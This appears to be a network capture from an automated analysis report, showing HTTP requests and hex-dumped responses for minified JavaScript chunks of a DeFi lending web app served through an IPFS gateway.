                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 66 61 64 32 39 34 33 38 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40fad29438a-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 37 38 37 5d 2c 7b 39 39 37 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 34 39 35 30 31 29 2c 61 3d 74 28 33 30 31 32 30 29 2c 6f 3d 74 28 32 39 36 33 30 29 2c 69 3d 74 28 36 39 33 33 31 29 2c 73 3d 74 28 36 37 39 31 36 29 2c 75 3d 74 28 38 35 38 39 33 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 74 78 45 72 72 6f 72 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 63 68
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4787],{99730:function(e,r,t){t.d(r,{f:function(){return c}});var n=t(49501),a=t(30120),o=t(29630),i=t(69331),s=t(67916),u=t(85893),c=function(e){var r=e.txError;return(0,u.jsxs)(a.Z,{ch
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 67 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 68 61 6e 64 6c 65 47 65 74 54 78 6e 73 2c 74 3d 65 2e 68 61 6e 64 6c 65 47 65 74 41 70 70 72 6f 76 61 6c 54 78 6e 73 2c 61 3d 65 2e 67 61 73 4c 69 6d 69 74 52
                                                                                                                                                                                                                                                  Data Ascii: rs?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):g(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var b=function(e){var r=e.handleGetTxns,t=e.handleGetApprovalTxns,a=e.gasLimitR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 65 2e 6e 65 78 74 3d 33 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 33 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 31 33 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 35 29 2c 65 2e 70 72 65 76 3d 31 35 2c 65 2e 6e 65 78 74 3d 31 38 2c 44 28 6f 2e 68 61 73 68 29 3b 63 61 73 65 20 31 38 3a 72 65 74 75 72 6e 20 69 3d 65 2e 73 65 6e 74 2c 6f 65 2e 63 75 72 72 65 6e 74 26 26 6e 26 26 6e 28 6e 65 77 20 45 72 72 6f 72 28 69 29 2c 6f 2e 68 61 73 68 29 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 29 3b 63 61 73 65 20 32 33 3a 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 32 33 2c 65 2e 74 31 3d 65 2e 63 61 74 63 68 28 31 35 29 2c 6f 65 2e 63 75 72 72 65 6e 74 26 26 6e 26 26 6e 28 65 2e 74 31 2c 6f 2e 68 61 73 68 29 2c 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72
                                                                                                                                                                                                                                                  Data Ascii: e.next=30;break;case 13:return e.prev=13,e.t0=e.catch(5),e.prev=15,e.next=18,D(o.hash);case 18:return i=e.sent,oe.current&&n&&n(new Error(i),o.hash),e.abrupt("return");case 23:return e.prev=23,e.t1=e.catch(15),oe.current&&n&&n(e.t1,o.hash),e.abrupt("retur
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 29 3b 63 61 73 65 20 33 33 3a 63 3d 28 30 2c 6d 2e 57 47 29 28 65 2e 74 31 2c 6d 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 4f 28 63 29 2c 41 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 3b 63 61 73 65 20 33 36 3a 65 2e 6e 65 78 74 3d 35 36 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 38 3a 69 66 28 21 5f 29 7b 65 2e 6e 65 78 74 3d 35 36 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 70 72 65 76 3d 33 39 2c 41 28 54 28 54 28 7b 7d 2c 4d 29 2c 7b 7d 2c 7b 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 29 2c 65 2e 6e 65 78 74 3d 34 33 2c 5f 2e 74 78 28 29 3b 63 61 73 65 20 34 33 3a 72 65 74 75 72 6e 20 64 65 6c 65 74 65 28 6c 3d 65 2e 73 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: urn e.abrupt("return");case 33:c=(0,m.WG)(e.t1,m.aD.GAS_ESTIMATION,!1),O(c),A({txHash:void 0,loading:!1});case 36:e.next=56;break;case 38:if(!_){e.next=56;break}return e.prev=39,A(T(T({},M),{},{loading:!0})),e.next=43,_.tx();case 43:return delete(l=e.sent
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 6f 6e 28 65 29 7b 53 28 7b 74 78 48 61 73 68 3a 65 2e 68 61 73 68 2c 6c 6f 61 64 69 6e 67 3a 21 31 2c 73 75 63 63 65 73 73 3a 21 30 7d 29 2c 4f 28 76 6f 69 64 20 30 29 7d 2c 65 72 72 6f 72 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 74 3d 28 30 2c 6d 2e 57 47 29 28 65 2c 6d 2e 61 44 2e 4d 41 49 4e 5f 41 43 54 49 4f 4e 29 3b 4f 28 74 29 2c 53 28 7b 74 78 48 61 73 68 3a 72 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 7d 2c 61 63 74 69 6f 6e 3a 6d 2e 61 44 2e 4d 41 49 4e 5f 41 43 54 49 4f 4e 7d 29 29 3b 63 61 73 65 20 31 30 3a 65 2e 70 72 65 76 3d 31 30 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 32 29 2c 61 3d 28 30 2c 6d 2e 57 47 29 28 65 2e 74 30 2c 6d 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 4f 28
                                                                                                                                                                                                                                                  Data Ascii: on(e){S({txHash:e.hash,loading:!1,success:!0}),O(void 0)},errorCallback:function(e,r){var t=(0,m.WG)(e,m.aD.MAIN_ACTION);O(t),S({txHash:r,loading:!1})},action:m.aD.MAIN_ACTION}));case 10:e.prev=10,e.t0=e.catch(2),a=(0,m.WG)(e.t0,m.aD.GAS_ESTIMATION,!1),O(
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 65 3a 52 2c 61 63 74 69 6f 6e 54 78 3a 46 2c 61 70 70 72 6f 76 61 6c 54 78 3a 5f 7d 7d 7d 2c 36 38 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 5f 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 62 55 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 44 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 24 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 32 30 38 35 34 29 2c 61 3d 74 28 31 32 37 39 29 2c 6f 3d 74 28 37 30 37 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 76 61 72 20 72 2c 74 3d 65 2e 66 72 6f 6d 41 6d 6f 75 6e 74 2c 6f 3d 65 2e 66 72 6f 6d 41 73 73 65 74 44 61 74 61 2c 69 3d 65 2e 66 72 6f 6d
                                                                                                                                                                                                                                                  Data Ascii: e:R,actionTx:F,approvalTx:_}}},68448:function(e,r,t){t.d(r,{_S:function(){return i},bU:function(){return s},DX:function(){return u},$m:function(){return c}});var n=t(20854),a=t(1279),o=t(70794);function i(e){var r,t=e.fromAmount,o=e.fromAssetData,i=e.from
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 68 45 29 28 22 2d 31 22 29 3a 28 30 2c 61 2e 68 45 29 28 63 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 29 2e 70 6c 75 73 28 66 29 2e 6d 69 6e 75 73 28 64 29 7d 7d 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 75 73 65 72 2c 74 3d 65 2e 61 6d 6f 75 6e 74 54 6f 52 65 63 65 69 76 65 41 66 74 65 72 53 77 61 70 2c 69 3d 65 2e 61 6d 6f 75 6e 74 54 6f 53 77 61 70 2c 73 3d 65 2e 66 72 6f 6d 41 73 73 65 74 44 61 74 61 2c 75 3d 65 2e 74 6f 41 73 73 65 74 44 61 74 61 2c 63 3d 65 2e 72 65 70 61 79 57 69 74 68 55 73 65 72 52 65 73 65 72 76 65 2c 6c 3d 65 2e 64 65 62 74 2c 64 3d 72 2e 69 73 49 6e 45 6d 6f 64 65 26 26 72 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 3d 3d 3d 73 2e 65 4d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 3f
                                                                                                                                                                                                                                                  Data Ascii: hE)("-1"):(0,a.hE)(c.healthFactor).plus(f).minus(d)}}var s=function(e){var r=e.user,t=e.amountToReceiveAfterSwap,i=e.amountToSwap,s=e.fromAssetData,u=e.toAssetData,c=e.repayWithUserReserve,l=e.debt,d=r.isInEmode&&r.userEmodeCategoryId===s.eModeCategoryId?
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 29 2c 68 66 41 66 74 65 72 53 77 61 70 3a 79 2e 69 73 4c 65 73 73 54 68 61 6e 28 30 29 26 26 21 79 2e 65 71 28 2d 31 29 3f 30 3a 79 7d 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 75 73 65 72 2c 74 3d 65 2e 75 73 65 72 52 65 73 65 72 76 65 2c 69 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 73 3d 65 2e 77 69 74 68 64 72 61 77 41 6d 6f 75 6e 74 2c 75 3d 28 30 2c 61 2e 68 45 29 28 72 2e 74 6f 74 61 6c 43 6f 6c 6c 61 74 65 72 61 6c 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 2c 63 3d 72 2e 63 75 72 72 65 6e 74 4c 69 71 75 69 64 61 74 69 6f 6e 54 68 72 65 73 68 6f 6c 64 2c 6c 3d 28 30 2c 61 2e 68 45 29 28 72 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 29 2c 64 3d 72 2e 69 73 49 6e 45 6d 6f 64 65 26 26 72 2e 75
                                                                                                                                                                                                                                                  Data Ascii: ),hfAfterSwap:y.isLessThan(0)&&!y.eq(-1)?0:y}},u=function(e){var r=e.user,t=e.userReserve,i=e.poolReserve,s=e.withdrawAmount,u=(0,a.hE)(r.totalCollateralMarketReferenceCurrency),c=r.currentLiquidationThreshold,l=(0,a.hE)(r.healthFactor),d=r.isInEmode&&r.u
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC175INData Raw: 6e 2e 4c 31 29 28 7b 63 6f 6c 6c 61 74 65 72 61 6c 42 61 6c 61 6e 63 65 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 3a 73 2c 62 6f 72 72 6f 77 42 61 6c 61 6e 63 65 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 3a 28 30 2c 61 2e 68 45 29 28 65 2e 74 6f 74 61 6c 42 6f 72 72 6f 77 73 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 2c 63 75 72 72 65 6e 74 4c 69 71 75 69 64 61 74 69 6f 6e 54 68 72 65 73 68 6f 6c 64 3a 75 7d 29 29 2c 69 7d 7d 7d 5d 29 3b
                                                                                                                                                                                                                                                  Data Ascii: n.L1)({collateralBalanceMarketReferenceCurrency:s,borrowBalanceMarketReferenceCurrency:(0,a.hE)(e.totalBorrowsMarketReferenceCurrency),currentLiquidationThreshold:u})),i}}}]);


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  20192.168.2.549732209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC739OUTGET /_next/static/chunks/1811.1d478527d9c58149.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 29683
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreia6jh2gotkgpaknk4tne6o6r3ismguyunhh67cy3dq5wprbpcunv4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1811.1d478527d9c58149.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreia6jh2gotkgpaknk4tne6o6r3ismguyunhh67cy3dq5wprbpcunv4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028475
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 30 62 62 30 63 38 63 64 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e410bb0c8cda-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 38 31 31 5d 2c 7b 33 34 36 33 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 61 3d 72 28 38 31 37 31 39 29 2c 6f 3d 72 28 38 37 30 35 34 29 2c 73 3d 28 72 28 36 37 32 39 34 29 2c 72 28 38 35 38 39 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1811],{34637:function(e,t,r){r.d(t,{Y:function(){return d},Z:function(){return p}});var n=r(59499),a=r(81719),o=r(87054),s=(r(67294),r(85893));function i(e,t){var r=Object.keys(e);if(Ob
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 74 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6c 69 70 3a 22 74 65 78 74 22 2c 74 65 78 74 46 69 6c 6c 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 7d 7d 7d 7d 29 29 2c 63 3d 28 30 2c 61 2e 5a 50 29 28 6f 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 68 65 6d 65 3b 72 65 74 75 72 6e 7b 62 6f 72 64 65 72 3a 22 30 70 78 22 2c 66 6c 65 78 3a 31 2c 63 6f 6c 6f 72 3a 74 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 6d 75 74 65 64 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 74 2e 70 61 6c 65 74 74 65 2e 6f 74 68 65
                                                                                                                                                                                                                                                  Data Ascii: t,backgroundClip:"text",textFillColor:"transparent"}}}})),c=(0,a.ZP)(o.Z)((function(e){var t=e.theme;return{border:"0px",flex:1,color:t.palette.text.muted,borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{border:"1px solid ".concat(t.palette.othe
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3d 28 30 2c 61 2e 5a 50 29 28 6f 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 74 68 65 6d 65 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67 72 6f 75 6e 64 2e 68 65 61 64 65 72 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 22 2c 68 65 69 67 68 74 3a 22 33 36 70 78 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 7d 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 63 2c 75 28 7b 7d 2c 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 6c 2c 75 28 7b 7d 2c 65 29 29 7d 7d 2c 38 31 38 31 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 52 65 70 61 79
                                                                                                                                                                                                                                                  Data Ascii: =(0,a.ZP)(o.Z)((function(e){return{backgroundColor:e.theme.palette.background.header,padding:"2px",height:"36px",width:"100%"}}));function d(e){return(0,s.jsx)(c,u({},e))}function p(e){return(0,s.jsx)(l,u({},e))}},81811:function(e,t,r){r.r(t),r.d(t,{Repay
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3d 65 2e 72 65 70 61 79 41 6d 6f 75 6e 74 2c 6e 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 6f 3d 65 2e 66 72 6f 6d 41 73 73 65 74 44 61 74 61 2c 73 3d 65 2e 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 2c 69 3d 65 2e 73 78 2c 75 3d 65 2e 73 79 6d 62 6f 6c 2c 6c 3d 65 2e 72 61 74 65 4d 6f 64 65 2c 63 3d 65 2e 72 65 70 61 79 41 6c 6c 44 65 62 74 2c 64 3d 65 2e 75 73 65 46 6c
                                                                                                                                                                                                                                                  Data Ascii: ect(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var V=function(e){var t,r=e.repayAmount,n=e.poolReserve,o=e.fromAssetData,s=e.isWrongNetwork,i=e.sx,u=e.symbol,l=e.rateMode,c=e.repayAllDebt,d=e.useFl
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 73 74 75 73 3a 46 2e 68 50 7d 29 29 3b 63 61 73 65 20 31 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 2c 67 61 73 4c 69 6d 69 74 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 3a 46 2e 65 42 5b 6d 2e 55 51 2e 72 65 70 61 79 43 6f 6c 6c 61 74 65 72 61 6c 5d 2e 6c 69 6d 69 74 2c 73 6b 69 70 3a 79 7c 7c 21 72 7c 7c 30 3d 3d 3d 70 61 72 73 65 46 6c 6f 61 74 28 72 29 7c 7c 70 2c 73 70 65 6e 64 65 72 3a 6e 75 6c 6c 21 3d 3d 28 74 3d 41 2e 61 64 64 72 65 73 73 65 73 2e 52 45 50 41 59 5f 57 49 54 48 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 41 44 41 50 54
                                                                                                                                                                                                                                                  Data Ascii: stus:F.hP}));case 1:case"end":return e.stop()}}),e)})));return function(){return e.apply(this,arguments)}}(),gasLimitRecommendation:F.eB[m.UQ.repayCollateral].limit,skip:y||!r||0===parseFloat(r)||p,spender:null!==(t=A.addresses.REPAY_WITH_COLLATERAL_ADAPT
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 47 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 72 3d 65 2e 73 79 6d 62 6f 6c 2c 6e 3d 65 2e 64 65 62 74 54 79 70 65 2c 73 3d 65 2e 75 73 65 72 52 65 73 65 72 76 65 2c
                                                                                                                                                                                                                                                  Data Ascii: riptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):G(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function z(e){var t=e.poolReserve,r=e.symbol,n=e.debtType,s=e.userReserve,
